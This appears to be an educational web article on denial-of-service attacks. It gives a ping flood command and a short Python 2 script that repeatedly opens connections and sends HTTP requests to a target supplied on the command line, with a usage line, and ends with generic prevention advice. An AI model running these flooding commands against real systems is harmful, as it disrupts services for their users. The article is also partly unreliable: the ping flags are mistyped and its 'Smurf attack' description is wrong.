Denial of Service and Prevention

• Difficulty Level : Medium
• Last Updated : 02 Nov, 2021

Denial of Service (DoS) is a cyber-attack on an individual Computer or Website with the intent to deny services to intended users. Their purpose is to disrupt an organization’s network operations by denying access to its users. Denial of service is typically accomplished by flooding the targeted machine or resource with surplus requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
For example, if a bank website can handle 10 people a second clicking the Login button, an attacker only has to send 10 fake requests per second to make it so no legitimate users can login.

DoS attacks exploit various weaknesses in computer network technologies. They may target servers, network routers, or network communication links. They can cause computers and routers to crash and links to bog down.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them. In the early days of the Web, this attack could cause unprotected Internet servers to crash quickly.

It is strongly recommended to try all described activities on virtual machines rather than your working environment

Following is the command for performing flooding of requests on an IP

ping ip_address –t -65500

HERE,

• “ping” sends the data packets to the victim.
• “ip_address” is the IP address of the victim.
• “-t” means the data packets should be sent until the program is stopped.
• “-l(65500)” specifies the data load to be sent to the victim.

Other basic types of DoS attacks involve

• Flooding a network with useless activity so that genuine traffic cannot get through. The TCP/IP SYN and smurf attacks are two common examples.
• Remotely overloading a system’s CPU so that valid requests cannot be processed.
• Changing permissions or breaking authorization logic to prevent users from logging into a system. One common example involves triggering a rapid series of false login attempts that lockout accounts from being able to log in.
• Deleting or interfering with specific critical applications or services to prevent their normal operation (even if the system and network overall are functional).

Another variant of the DoS is the Smurf_attack. This involves emails with automatic responses. If someone emails hundreds of email messages with a fake return email address to hundreds of people in an organization with an autoresponder on in their email, the initial sent messages can become thousands sent to the fake email address. If that fake email address actually belongs to someone, this can overwhelm that person’s account.

DoS attacks can cause the following problems:

• Ineffective services
• Inaccessible services
• Interruption of network traffic
• Connection interference

Following is the python script for performing a denial of service attack for a small website that didn’t expect so much socket connection

# Please note that running this code might

# cause your IP blocked by server. And purpose

# of this code is only learning.

import socket, sys, os  

print "][ Attacking " + sys.argv[1]  + " ... ]["  

print "injecting " + sys.argv[2];  

def attack():  

    #pid = os.fork()  

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

    s.connect((sys.argv[1], 80))  

    print ">> GET /" + sys.argv[2] + " HTTP/1.1"  

    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")  

    s.send("Host: " + sys.argv[1]  + "\r\n\r\n");  

    s.close()  

# Driver code

for i in range(1, 1000):  

    attack() 

We can use above code as

python ddos.py target_ip_address apache

Prevention

Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.

• Cloud Mitigation Provider – Cloud mitigation providers are experts at providing DDoS mitigation from the cloud. This means they have built out massive amounts of network bandwidth and DDoS mitigation capacity at multiple sites around the Internet that can take in any type of network traffic, whether you use multiple ISP’s, your own data center, or any number of cloud providers. They can scrub the traffic for you and only send “clean” traffic to your data center.
• Firewall – This is the simplest and least effective method. Generally, someone writes some Python scripts that try to filter out the bad traffic or an enterprise will try and use its existing firewalls to block the traffic
• Internet Service Provider (ISP) – Some enterprises use their ISP to provide DDoS mitigation. These ISP’s have more bandwidth than an enterprise would, which can help with the large volumetric attacks

To safeguard from these attacks you have to apply secure coding and design strong architecture which can prevent these kinds of attacks and update day-to-day solutions to bugs on your website.